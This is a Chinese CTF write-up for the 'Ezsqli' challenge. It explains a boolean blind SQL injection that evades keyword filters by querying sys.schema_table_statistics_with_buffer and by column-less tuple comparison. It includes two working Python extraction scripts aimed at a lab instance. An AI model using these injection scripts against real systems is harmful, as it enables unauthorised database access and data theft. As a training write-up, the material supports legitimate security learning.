GYCTF2020]Ezsqli
过滤了好多东西,包括用来查询的information关键词,本上就是考虑盲注了
当||后面条件为真时返回Nu1L,为假时返回V&N,这就是判断盲注语句是否成立的关键
当||后面条件为真时返回Nu1L,为假时返回V&N,这就是判断盲注语句是否成立的关键
接下来就可以写脚本判断表名了
import requests
url = 'http://bfd71058-3cf0-4e87-8731-8935a651f051.node3.buuoj.cn/'
payload = '2||ascii(substr((select group_concat(table_name) from sys.schema_table_statistics_with_buffer where table_schema=database()),{},1))={}'
result = ''
for j in range(1,500):
for i in range(32, 127):
py = payload.format(j,i)
post_data = {'id': py}
re = requests.post(url, data=post_data)
if 'Nu1L' in re.text:
result += chr(i)
print(result)
break
可以看到存在这两张表,下面就要实现无列名注入
这里用到了ascii位偏移,关于ascii偏移的利用,可以看下面的例子
可以看到比较两个字符串的大小与字符串的长度是没有关系的,给定两个字符串,会各取两个字符串的首字符ascii码来比较,不等式成立返回1,不等式不成立返回0,换一个角度来说,只会比较一次,也就是首字符
这道题我们利用的就是这个特性,我们首先会从构造一个ascii从32到128的循环,与flag字符一一对比,满足条件返回Nu1L,输出符合条件的ascii对应的字符,也就是找到了flag的第一个字符,以此类推,直到输出所有的flag
import requests
url = 'http://bfd71058-3cf0-4e87-8731-8935a651f051.node3.buuoj.cn/'
def add(flag):
res = ''
res += flag
return res
flag = ''
for i in range(1,200):
for char in range(32, 127):
hexchar = add(flag + chr(char))
payload = '2||((select 1,"{}")>(select * from f1ag_1s_h3r3_hhhhh))'.format(hexchar)
#print(payload)
data = {'id':payload}
r = requests.post(url=url, data=data)
text = r.text
if 'Nu1L' in r.text:
flag += chr(char-1)
print(flag)
break
有三个需要注意的点
第一个
注意这里的chr(char-1),我们在本地测试来看一下为什么
当我们匹配flag的时候,一定会先经过匹配到字符相等的情况,这一这个时候返回的是0,对应题目中的V&N,很明显此时的chr(char)并不是我们想要的,我们在输出1(Nu1L)的时候,匹配的是f的下一个字符g,而我们想要的是f,此时chr(char-1)=‘f’,所以这里要用chr(char-1)
第二个
注意循环那里
这里循环的上限一定要大于等于127,
这里}的ascii是125,如果取126的话,for循环取到的i的最大值是125,别忘了我们进行了chr(char-1)的操作也就是说最大匹配到ascii为124的字符,不能匹配到},所以这里要扩大上限(其实也没有关系,flag都出来了,自己加上一个}大家也肯定会这么做的,注意这个点就可以了)
第三个
关于payload中的
(select 1,"{}")>(select * from f1ag_1s_h3r3_hhhhh)
这里的字段数一定是一一匹配,这里f1ag_1s_h3r3_hhhhh是有两个字段的(可以用select 1|select 1,2|select 1,2,3试试就好),知道是两个字段后,还要注意字段内的一一对应,f1ag_1s_h3r3_hhhhh表中的flag在第二个字段
这样"{}"与flag就实现了对应(f1ag_1s_h3r3_hhhhh表的第一个字段可能是id啥的,跟咱们没有关系了)
199
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
